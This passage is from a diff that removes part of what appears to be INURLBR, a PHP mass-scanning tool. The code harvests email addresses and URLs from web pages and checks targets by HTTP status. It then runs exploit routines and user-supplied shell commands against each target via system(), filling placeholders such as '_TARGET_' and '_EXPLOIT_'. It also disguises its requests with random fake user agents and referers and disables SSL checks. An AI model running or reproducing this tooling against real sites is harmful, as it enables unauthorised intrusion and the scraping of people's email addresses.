- * de um processo e of que significa de. Portanto pidof quer dizer identidade
- * de processo de...
- * O equivalente no Solaris é pgrep. pidof firefox-bin O commando acima retorna
- * o pid do processo que está executando firefox-bin.
- * Pode-se combinar o commando 'pidof' com o commando kill dessa forma:
- * kill -9 $(pidof firefox-bin) pidof é simplesmente uma ligação simbólica
- * para o programa killall5,que está localizado em /sbin.
- */
-}
-
-################################################################################
-#This function will validate emails#############################################
-################################################################################
-
-function __validateEmail($email) {
-
- $conta = "^[a-zA-Z0-9\._-]+@";
- $domino = "[a-zA-Z0-9\._-]+.";
- $extensao = "([a-zA-Z]{2,4})$";
-
- $pattern = $conta . $domino . $extensao;
-
- return (ereg($pattern, $email)) ? TRUE : FALSE;
-}
-
-################################################################################
-#This function will validate URLS###############################################
-################################################################################
-
-function __validateURL($url) {
-
- if (preg_match("#\b(http[s]?://|ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si", $url)) {
- return TRUE;
- } else {
- return FALSE;
- }
-}
-
-################################################################################
-#This function will filter custom values########################################
-################################################################################
-
-function __extractRegCustom($html, $url_) {
-
- $matches = NULL;
- __plus();
- preg_match_all("#\b{$_SESSION['config']['regexp-filter']}#i", $html, $matches);
-
- echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
- echo "{$_SESSION["c1"]} |_[ URL ] {$_SESSION["c0"]}=>{$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
-
- $matches_ = array_filter(array_unique(array_unique($matches[0])));
- foreach ($matches_ as $valor) {
-
- if (not_isnull_empty($valor)) {
-
- echo "{$_SESSION["c1"]}__[ + ] {$_SESSION["c0"]}[\033[01;31m {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]- {$valor}\n";
- $_SESSION["config"]["resultado_valores"].="{$valor}\n";
- __plus();
- __saveValue($_SESSION["config"]["arquivo_output"], $valor);
- $_SESSION['config']['cont_valores'] ++;
- }
- __plus();
- }
- __timeSec('delay', "\n");
-}
-
-################################################################################
-#This function will filter and mail each url####################################
-################################################################################
-
-function __filterEmailif($resultados) {
-
- if (is_array($resultados)) {
- echo "{$_SESSION["c1"]}|_[ ! ][ INFO ]{$_SESSION["c16"]}[ FILTERING VALUE ]::{$_SESSION["c1"]}[ {$_SESSION["config"]['ifemail']} ]{$_SESSION["c0"]}\n";
- foreach ($resultados as $value) {
-
- $temp[] = (strstr($value, $_SESSION['config']['ifemail']) ? $value : NULL);
- }
-
- return array_unique(array_filter($temp));
- }
-
- RETURN FALSE;
-}
-
-################################################################################
-#This function extract emails###################################################
-################################################################################
-
-function __extractEmail($html, $url_) {
-
- $matches = NULL;
- __plus();
- preg_match_all('/([\w\d\.\-\_]+)@([\w\d\.\_\-]+)/mi', $html, $matches);
- echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
- echo "{$_SESSION["c1"]}|_[ ! ][ INFO ][URL] :: {$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
-
- $_matches = array_filter(array_unique(array_unique($matches[0])));
- $matches_ = (not_isnull_empty($_SESSION['config']['ifemail']) ? __filterEmailif($_matches) : $_matches);
-
- foreach ($matches_ as $valor) {
-
- if (__validateEmail($valor)) {
-
- echo "{$_SESSION["c1"]}|_[ + ]{$_SESSION["c0"]}[\033[01;31m {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]- {$valor} "
- . (filter_var($valor, FILTER_VALIDATE_EMAIL) ?
- "{$_SESSION["c14"]}[ OK ]{$_SESSION["c0"]}" : "{$_SESSION["c16"]}[ NO ]{$_SESSION["c0"]}") . "\n";
- (filter_var($valor, FILTER_VALIDATE_EMAIL) ? $_SESSION["config"]["resultado_valores"].="{$valor}\n" : NULL);
- __plus();
- (filter_var($valor, FILTER_VALIDATE_EMAIL) ? __saveValue($_SESSION["config"]["arquivo_output"], $valor) : NULL);
-
- $_SESSION['config']['cont_valores'] ++;
- }
- __plus();
- }
- __timeSec('delay', "\n");
-}
-
-################################################################################
-#This function will filter urls each url########################################
-################################################################################
-
-function __extractURLs($html, $url_) {
-
- $matches = NULL;
- __plus();
- $reg_tag = 'href=\"|src=\"|value=\"';
- $reg = "#\b({$reg_tag}http[s]?://|{$reg_tag}ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si";
- preg_match_all($reg, $html, $matches);
- echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
- echo "{$_SESSION["c1"]} |_[ INFO ][URL] {$_SESSION["c0"]}=>{$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
- echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
- $matches_ = array_unique(array_filter($matches[0]));
- $blacklist = $_SESSION["config"]['blacklist'];
- $blacklist_ = (isset($_SESSION["config"]["webcache"])) ? str_replace('webcache.,', '', $blacklist) : $blacklist;
-
- foreach ($matches_ as $valor) {
-
- $valor = __filterURLTAG($valor);
- if (__validateURL($valor) && !__validateOptions($blacklist_, $valor, 1)) {
- echo "{$_SESSION["c1"]}__[ + ]{$_SESSION["c0"]}[\033[01;31m {$_SESSION["config"]['cont_url']}"
- . " {$_SESSION["c9"]}]- {$valor}{$_SESSION["c0"]}\n";
- $_SESSION["config"]["resultado_valores"].="{$valor}\n";
- __plus();
- __saveValue($_SESSION["config"]["arquivo_output"], $valor) . __plus();
- $_SESSION["config"]["cont_url"] ++;
- }
- __plus();
- }
- __timeSec('delay', "\n");
-}
-
-################################################################################
-#This function removes the last regular expression ta###########################
-################################################################################
-
-function __filterURLTAG($valor = NULL) {
-
- return(!is_null($valor)) ? str_replace('"', '', str_replace('href="', '', str_replace('src="', '', str_replace('value="', '', $valor)))) : NULL;
-}
-
-################################################################################
-#Esta função irá formatar salvar urls concatenadas##############################
-################################################################################
-
-function __checkURLs($resultado, $url_) {
-
- __plus();
- $code = !is_null($_SESSION["config"]["ifcode"]) ? $_SESSION["config"]["ifcode"] : 200;
- $valor = ($resultado['server']['http_code'] == $code) ? "{$_SESSION["c4"]}" : NULL;
-
- echo "\n{$_SESSION["c1"]} |_[ INFO ]{$_SESSION["c0"]}[{$_SESSION["c1"]} {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]\n";
- echo "{$_SESSION["c1"]} |_[ INFO ][URL] {$_SESSION["c0"]}::{$_SESSION["c9"]}{$valor} {$url_} {$_SESSION["c0"]}\n";
- echo "{$_SESSION["c1"]} |_[ INFO ][STATUS]::{$valor} {$resultado['server']['http_code']} {$_SESSION["c0"]}\n";
-
- __timeSec('delay');
- echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}";
- __plus();
-
- $target_ = array('url_clean' => $url_, 'url_xpl' => $url_);
-
- if ($resultado == $code) {
-
- $_SESSION['config']['resultado_valores'].= "{$url_}\n";
- __saveValue($_SESSION["config"]["arquivo_output"], $url_) . __plus();
- __plus();
-
- (not_isnull_empty($_SESSION['config']['sub-file']) &&
- is_array($_SESSION['config']['sub-file']) ? __subExecExploits($target_['url_xpl'], $_SESSION['config']['sub-file']) : NULL);
- __plus();
-
- (not_isnull_empty($_SESSION['config']['command-vul']) ? __command($_SESSION['config']['command-vul'], $target_) : NULL);
- __plus();
-
- (not_isnull_empty($_SESSION['config']['exploit-vul-id']) ?
- __configExploitsExec($_SESSION['config']['exploit-vul-id'], $target_) : NULL);
- __plus();
- }
-
- (not_isnull_empty($_SESSION['config']['exploit-all-id']) ? __configExploitsExec($_SESSION['config']['exploit-all-id'], $target_) : NULL);
- __plus();
-
- (not_isnull_empty($_SESSION['config']['command-all']) ? __command($_SESSION['config']['command-all'], $target_) : NULL);
- __plus();
-
- $_SESSION['config']['cont_valores'] ++;
-
- __plus();
-}
-
-################################################################################
-#This function will send the contents of the output buffer (if any)#############
-################################################################################
-
-function __plus() {
-
- ob_flush();
- flush();
-}
-
-################################################################################
-#FORMATTING POST################################################################
-################################################################################
-
-function __convertUrlQuery($query) {
-
- $queryParts = explode('&', $query);
- $params = array();
- $match = array();
- foreach ($queryParts as $param) {
- $item = explode('=', $param);
- preg_match_all("([a-zA-Z0-9]=(.*))", $param, $match);
- $params[$item[0]] = ($match[1][0]);
- }
-
- return $params;
-}
-
-################################################################################
-#OPEN FILE BASE FOR VALIDATION##################################################
-################################################################################
-
-function __openFile($arquivo, $op = NULL) {
-
- if (isset($arquivo) && !empty($arquivo)) {
- $resultadoURL = array_unique(array_filter(explode("\n", file_get_contents($arquivo))));
-
- if (is_array($resultadoURL)) {
-
- return ($op == 1 ? $resultadoURL : __process($resultadoURL));
- }
- }
-}
-
-################################################################################
-#CATCH INFORMATION IP###########################################################
-################################################################################
-
-function __infoIP($ip, $op = 0) {
-
- /*
- [longitude] => 4.9
- [latitude] => 52.3667
- [asn] => AS196752
- [offset] => 2
- [ip] => 46.19.37.0
- [area_code] => 0
- [continent_code] => EU
- [dma_code] => 0
- [timezone] => Europe/Amsterdam
- [country_code] => NL
- [isp] => Tilaa B.V.
- [country] => Netherlands
- [country_code3] => NLD
- */
-
- preg_match_all('#\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})#si', $ip, $ip);
- if (filter_var($ip[0][0], FILTER_VALIDATE_IP)) {
- if ($op == 0) {
- $request__ = __request_info("http://www.telize.com/geoip/{$ip[0][0]}", $_SESSION["config"]["proxy"], NULL);
- __plus();
- return json_decode($request__['corpo'], TRUE);
- } else {
- $_SESSION['config']['verifica_info'] = NULL;
- $request__ = __request_info("http://www.telize.com/geoip/{$ip[0][0]}", $_SESSION["config"]["proxy"], NULL);
- $return = json_decode($request__['corpo'], TRUE);
- __plus();
- return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}";
- }
- }
-}
-
-################################################################################
-#CAPTURE URL POSITION IN BROWSER ALEXA / RELEVANCE OF SUCH URL##################
-################################################################################
-
-function __positionAlexa($url) {
-
- $xmlSimple = simplexml_load_file("http://data.alexa.com/data?cli=10&dat=snbamz&url={$url}");
- $resultRank = $xmlSimple->SD[1];
- __plus();
- if ($resultRank) {
- $retornoRank = $resultRank->REACH->attributes()->RANK;
- } else {
- $retornoRank = 0;
- }
- return $retornoRank . __plus();
-}
-
-################################################################################
-#GENERATE URL REFERENCE random##################################################
-################################################################################
-
-function __setURLReferenceRandom() {
-
- $dominio = array('Adzuna', 'Bixee', 'CareerBuilder', 'Craigslist', 'Dice', 'Eluta.ca', 'Hotjobs', 'JobStreet', 'Incruit', 'Indeed', 'Glassdoor', 'LinkUp', 'Monster', 'Naukri',
- 'Yahoo', 'Legal', 'GoogleScholar', 'Lexis', 'Manupatra', 'Quicklaw', 'WestLaw', 'Medical', 'Bing Health', 'Bioinformatic', 'CiteAb', 'EB-eye', 'Entrez', 'mtv', 'ubuntu',
- 'GenieKnows', 'GoPubMed', 'Healia', 'Healthline', 'Nextbio', 'PubGene', 'Quertle', 'Searchmedica', 'WebMD', 'News', 'BingNews', 'Daylife', 'GoogleNews', 'aol', 'microsoft',
- 'MagPortal', 'Newslookup', 'Nexis', 'Topix', 'Trapit', 'YahooNews', 'People', 'Comfibook', 'Ex.plode', 'InfoSpace', 'PeekYou', 'Spock', 'Spokeo', 'WorldwideHelpers', 'iPhone',
- 'Zabasearch', 'ZoomInfo', 'Fizber', 'HotPads', 'Realtor', 'Redfin', 'Rightmove', 'Trulia', 'Zillow', 'Zoopla', 'StuRents', 'globo', 'sbt', 'band', 'cnn', 'blog.inurl.com.br'
- );
-
- $gTLD = array('aero', 'arpa', 'biz', 'com', 'coop', 'edu', 'gov', 'info', 'int', 'mil', 'museum', 'name', 'net', 'org', 'pro', 'tel');
-
- $arquivo = array('admin', 'index', 'wp-admin', 'info', 'shop', 'file', 'out', 'open', 'news', 'add', 'profile', 'search', 'open', 'photo', 'insert', 'view');
- $ext = array('exe', 'php', 'asp', 'aspx', 'jsf', 'html', 'htm', 'lua', 'log', 'cgi', 'sh', 'css', 'py', 'sql', 'xml', 'rss');
-
- $pasta = array('App_Files', 'Assets', 'CFFileServlet', 'CFIDE', 'Communication', 'Computers', 'CoreAdminHome', 'CoreHome', 'Crawler', 'Creator',
- 'DECOM', 'Dashboard', 'Drives', 'Dynamic', 'FCKeditor', 'Feedback', 'Files', 'Flash', 'Forms', 'Help', 'ICEcore', 'IO', 'Image', 'JPG', 'getold',
- 'JSP', 'KFSI', 'Laguna', 'Login', 'Motors', 'MultiSites', 'NR', 'OCodger', 'RSS', 'Safety', 'Smarty', 'Software', 'Static', 'Stress', 'getfull',
- 'Sugarcrm', 'Travel', 'UPLOAD', 'Urussanga', 'UserFiles', '__tpl', '_fckeditor', '_info', '_machine', '_plugins', '_sample', '_samples', 'postmost',
- '_source', '_testcases', 'aaa', 'abelardoluz', 'aberlardoluz', 'aborto', 'about', 'aboutus', 'abuse', 'abusers', 'ac_drives', 'acabamentos', 'mail',
- 'academias', 'acao', 'acartpro', 'acatalog', 'acc', 'acc_auto_del', 'acc_beep_ken', 'acc_beep_time', 'acc_ch_mail', 'acc_fc_prsc', 'accounts', 'validar',
- 'acc_html_mark', 'acc_html_rand', 'acc_lan_page', 'acc_pic_html', 'acc_profol', 'acc_soft_link', 'acc_ssd_page', 'acc_syun_ei', 'german', 'intranet', 'old',
- 'acc_time_go', 'acc_wbcreator', 'accept', 'accepted', 'acceso', 'access', 'accessibility', 'accessories', 'acciones', 'acclg', 'account', 'paste', 'paste22',
- 'acessorios', 'acontece', 'acougueiro', 'acoustic', 'act', 'action', 'activate', 'active', 'activeden', 'activism', 'actualit', 'actuators', 'ad', 'informatica',
- 'ad_division', 'ad_rate', 'adapter', 'adapters', 'adaptive', 'adaptivei', 'adatmentes', 'adbanner', 'adblock', 'adboard', 'adclick', 'add-ons', 'add', 'delete',
- 'added', 'addon', 'address', 'adduser', 'adfree', 'adhoc', 'adinfo', 'adios_papa', 'adlink', 'adlinks', 'acc_folder_vw', 'acc_syun_su',
- );
-
- $locais = array('ac', 'ad', 'ae', 'af', 'ag', 'al', 'am', 'an', 'ao', 'aq', 'ar', 'as', 'at', 'au', 'aw', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn',
- 'bw', 'by', 'bz', 'ca', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'bo', 'br',
- 'ec', 'ee', 'eg', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'bs', 'bt',
- 'gs', 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'bv',
- 'kh', 'ki', 'km', 'kn', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mk', 'ml',
- 'mm', 'mn', 'mo', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'nb', 'nc', 'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om',
- 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si',
- 'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'ss', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tr', 'tt', 'tv',
- 'tw', 'tz', 'ua', 'ug', 'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'yu', 'za', 'zm', 'zw', 'ai',
- );
- return "http://www." . strtolower($dominio[rand(0, count($dominio) - 1)]) . ".{$gTLD[rand(0, count($gTLD) - 1)]}.{$locais[rand(0, count($locais) - 1)]}/{$pasta[rand(0, count($pasta) - 1)]}/{$arquivo[rand(0, count($arquivo) - 1)]}.{$ext[rand(0, count($ext) - 1)]}";
-}
-
-################################################################################
-#GENERATE AGENT BROWSER random##################################################
-################################################################################
-
-function __setUserAgentRandom() {
-
- $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
- 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse',
- 'K-Meleon', 'GoogleBot', 'Konqueror', 'Minimo', 'Googlebot', 'WeltweitimnetzBrowser', 'SuperBot', 'TerrawizBot', 'YodaoBot', 'Wyzo', 'Grail',
- 'PycURL', 'Galaxy', 'EnigmaFox', '008', 'ABACHOBot', 'Bimbot', 'Covario IDS', 'iCab', 'KKman', 'Oregano', 'WorldWideWeb', 'Wyzo', 'GNU IceCat',
- 'Vimprobable', 'uzbl', 'Slim Browser', 'Flock', 'OmniWeb', 'Rockmelt', 'Shiira', 'Swift', 'Pale Moon', 'Camino', 'Flock', 'Galeon', 'Sylera'
- );
-
- $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
- 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
- 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
- 'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu',
- 'Fluxbuntu', 'Freespire', 'GNewSense', 'Gobuntu', 'gOS', 'Mint Linux', 'Kubuntu', 'Xubuntu', 'ZeVenOS', 'Zebuntu', 'DemoLinux',
- 'Dreamlinux', 'DualOS', 'eLearnix', 'Feather Linux', 'Famelix', 'FeniX', 'Gentoo', 'GoboLinux', 'GNUstep', 'Insigne Linux',
- 'Kalango', 'KateOS', 'Knoppix', 'Kurumin', 'Dizinha', 'TupiServer', 'Linspire', 'Litrix', 'Mandrake', 'Mandriva', 'MEPIS',
- 'Musix GNU Linux', 'Musix-BR', 'OneBase Go', 'openSuSE', 'pQui Linux', 'PCLinuxOS', 'Plaszma OS', 'Puppy Linux', 'QiLinux',
- 'Red Hat Linux', 'Red Hat Enterprise Linux', 'CentOS', 'Fedora', 'Resulinux', 'Rxart', 'Sabayon Linux', 'SAM Desktop', 'Satux',
- 'Slackware', 'GoblinX', 'Slax', 'Zenwalk', 'SuSE', 'Caixa Mágica', 'HP-UX', 'IRIX', 'OSF/1', 'OS-9', 'POSYS', 'QNX', 'Solaris',
- 'OpenSolaris', 'SunOS', 'SCO UNIX', 'Tropix', 'EROS', 'Tru64', 'Digital UNIX', 'Ultrix', 'UniCOS', 'UNIflex', 'Microsoft Xenix',
- 'z/OS', 'Xinu', 'Research Unix', 'InfernoOS'
- );
-
- $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
- 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
- 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
- 'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
- 'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE',
- 'de_LU', 'de_CH', 'de', 'el_CY', 'el_GR', 'el', 'iw_IL', 'iw', 'hi_IN', 'hu_HU', 'hu', 'is_IS', 'is', 'in_ID', 'in', 'ga_IE',
- 'ga', 'it_IT', 'it_CH', 'it', 'ja_JP', 'ja_JP_JP', 'ja', 'ko_KR', 'ko', 'lv_LV', 'lv', 'lt_LT', 'lt', 'mk_MK', 'mk', 'ms_MY',
- 'ms', 'mt_MT', 'mt', 'no_NO', 'no_NO_NY', 'no', 'pl_PL', 'pl', 'pt_PT', 'pt', 'ro_RO', 'ro', 'ru_RU', 'ru', 'sr_BA', 'sr_ME',
- 'sr_CS', 'sr_RS', 'sr', 'sk_SK', 'sk', 'sl_SI', 'sl', 'es_AR', 'es_BO', 'es_CL', 'es_CO', 'es_CR', 'es_DO', 'es_EC', 'es_SV',
- 'es_GT', 'es_HN', 'es_MX', 'es_NI', 'es_PA', 'es_PY', 'es_PE', 'es_PR', 'es_ES', 'es_US', 'es_UY', 'es_VE', 'es', 'sv_SE',
- 'sv', 'th_TH', 'th_TH_TH', 'th', 'tr_TR', 'tr', 'uk_UA', 'uk', 'vi_VN', 'vi'
- );
- return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
-}
-
-################################################################################
-#RESPONSIBLE FOR RUN COMMANDS IN TERMINAL the installation of facilities########
-################################################################################
-
-function __installDepencia() {
-
- echo __bannerlogo() . __plus();
- echo "\n{$_SESSION["c15"]}|_[ * ]__{$_SESSION["c0"]}\n";
- echo " {$_SESSION["c15"]}|[EXTERNAL COMMAND INSTALLING PREMISES ]:: {$_SESSION["c11"]}\n";
- $dados = system("sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl", $dados) . __plus();
- sleep(1) . __plus();
- echo "{$_SESSION["c0"]}";
- if (empty($dados)) {
-
- return FALSE;
- }
- unset($dados);
- exit();
-}
-
-################################################################################
-#RESPONSIBLE FOR RUN COMMANDS IN TERMINAL#######################################
-################################################################################
-
-function __command($commando, $alvo) {
-
- if (!is_null($commando)) {
-
- (strstr($commando, '_TARGET_') ||
- strstr($commando, '_TARGETFULL_') ||
- strstr($commando, '_TARGETIP_') ||
- strstr($commando, '_EXPLOIT_') ||
- strstr($commando, '_URI_') ||
- strstr($commando, '_URI_') ||
- strstr($commando, '_PORT_') ||
- strstr($commando, '_RANDOM_') ? NULL :
- __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c2"]}SET PARAMETER - command correctly{$_SESSION["c0"]}\n"));
-
- $uri = parse_url($alvo['url_xpl']);
-
- $command[0] = str_replace("_TARGET_", "{$_SESSION["c8"]}" . __filterHostname($alvo['url_xpl']) . "{$_SESSION["c1"]}", $commando);
- $command[0] = str_replace('_TARGETIP_', "{$_SESSION["c9"]}{$_SESSION['config']['server_ip']}{$_SESSION["c1"]}", $command[0]);
- $command[0] = str_replace('_TARGETFULL_', "{$_SESSION["c14"]}{$alvo['url_clean']}{$_SESSION["c1"]}", $command[0]);
- $command[0] = str_replace('_TARGETXPL_', "{$_SESSION["c14"]}{$alvo['url_xpl']}{$_SESSION["c1"]}", $command[0]);
- $command[0] = str_replace("_EXPLOIT_", "{$_SESSION["c6"]}{$_SESSION['config']['exploit-command']}{$_SESSION["c1"]}", $command[0]);
- $command[0] = str_replace('_URI_', "{$_SESSION["c8"]}{$uri['path']}{$_SESSION["c1"]}", $command[0]);
- $command[0] = str_replace('_PORT_', "{$_SESSION["c9"]}{$alvo['url_port']}{$_SESSION["c1"]}", $command[0]);
- $command[0] = str_replace('_RANDOM_', "{$_SESSION["c15"]}" . random(5) . "{$_SESSION["c1"]}", $command[0]);
-
- $command[0] = __crypt($command[0]);
-
- $command[1] = str_replace("_TARGET_", __filterHostname($alvo['url_clean']), $commando);
- $command[1] = str_replace('_TARGETIP_', $_SESSION['config']['server_ip'], $command[1]);
- $command[1] = str_replace('_TARGETFULL_', $alvo['url_clean'], $command[1]);
- $command[1] = str_replace('_TARGETXPL_', $alvo['url_xpl'], $command[1]);
- $command[1] = str_replace("_EXPLOIT_", $_SESSION['config']['exploit-command'], $command[1]);
- $command[1] = str_replace("_URI_", $uri['path'], $command[1]);
- $command[1] = str_replace("_PORT_", $alvo['url_port'], $command[1]);
- $command[1] = str_replace("_RANDOM_", random(5), $command[1]);
- $command[1] = str_replace("\n", '', str_replace("\r", '', $command[1]));
-
- $command[1] = __crypt($command[1]);
-
- echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
- echo " |[ EXTERNAL COMMAND ]:: {$command[0]}{$_SESSION["c11"]}\n";
- $_ = array(0 => ($_SESSION['config']['popup']) ? 'sudo xterm -geometry 134x50+1900+0 -title "Auxiliary Window - INURLBR / COMMAND" -e ' : NULL, 1 => ($_SESSION['config']['popup']) ? ' > /dev/null &' : NULL);
- echo ($_SESSION['config']['popup'] ? "\t[!] opening auxiliary window...\n" : NULL);
- $dados = system($_[0] . $command[1] . $_[1], $dados);
- sleep(1) . __plus();
-
- echo $_SESSION["c0"];
- }
- if (empty($dados[0])) {
-
- return FALSE;
- }
- unset($dados);
-}
-
-################################################################################
-#FILTER BY TAKING ONLY RESPONSIBLE URL HOSTNAME#################################
-################################################################################
-
-function __filterHostname($url) {
-
- $alvo_ = NULL;
- //#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i - 1.0
- preg_match_all('@^(?:(ht|f)tps?://*)?([^/]+)@i', $url, $alvo_);
- return str_replace("/", '', str_replace("ftps:", '', str_replace("ftp:", '', str_replace("https:", '', str_replace("http:", '', $alvo_[0][0])))));
-}
-
-################################################################################
-#RESPONSIBLE FOR ALL REQUESTS GET / POST THE SCRIPT#############################
-################################################################################
-/*
- curl_multi_init — Returns a new cURL multi handle
- (PHP 5) http://php.net/manual/en/function.curl-multi-init.php
- */
-
-function __request_info($url_, $proxy = NULL, $postDados = NULL) {
-
- $url_ = __crypt($url_);
- $mh = curl_multi_init();
- $curl_array = array();
- $nodes = is_array($url_) ? $url_ : array($url_);
-
- foreach ($nodes as $i => $url) {
-
- $curl_array[$i] = curl_init($url);
-
- __plus();
-
- //FORMATANDO POST & EXECUTANDO urlencode EM CADA VALOR DO POST.
- if (not_isnull_empty($postDados) && is_array($postDados)) {
-
- foreach ($postDados as $campo => $valor) {
-
- $postDados_format .= "{$campo}=" . urlencode($valor) . '&';
- }
-
- $postDados_format = rtrim($postDados_format, '&');
- curl_setopt($curl_array[$i], CURLOPT_POST, count($postDados));
- curl_setopt($curl_array[$i], CURLOPT_POSTFIELDS, __crypt($postDados_format));
- }
-
- curl_setopt($curl_array[$i], CURLOPT_HTTPHEADER, array_merge(not_isnull_empty($_SESSION['config']['http-header']) ?
- explode(',', __crypt($_SESSION['config']['http-header'])) : array(), array("Cookie: disclaimer_accepted=true")));
- curl_setopt($curl_array[$i], CURLOPT_USERAGENT, (not_isnull_empty($_SESSION['config']['user-agent'])) ?
- __crypt($_SESSION['config']['user-agent']) : __setUserAgentRandom());
- curl_setopt($curl_array[$i], CURLOPT_REFERER, (not_isnull_empty($_SESSION['config']['url-reference'])) ?
- __crypt($_SESSION['config']['url-reference']) : __setURLReferenceRandom());
-
- (!is_null($proxy) ? curl_setopt($curl_array[$i], CURLOPT_PROXY, $proxy) : NULL);
- (!is_null($_SESSION['config']['verifica_info'])) ? curl_setopt($curl_array[$i], CURLOPT_HEADER, 1) : NULL;
- (!is_null($_SESSION['config']['verifica_info']) && __validateOptions('3,6', $_SESSION['config']['debug']) ?
- curl_setopt($curl_array[$i], CURLOPT_VERBOSE, 1) : NULL);
-
- __plus();
- curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($curl_array[$i], CURLOPT_FRESH_CONNECT, 1);
- curl_setopt($curl_array[$i], CURLOPT_RETURNTRANSFER, 1);
-
- curl_setopt($curl_array[$i], CURLOPT_CONNECTTIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ?
- $_SESSION['config']['time-out'] : 5);
-
- curl_setopt($curl_array[$i], CURLOPT_TIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ?
- $_SESSION['config']['time-out'] : 5);
-
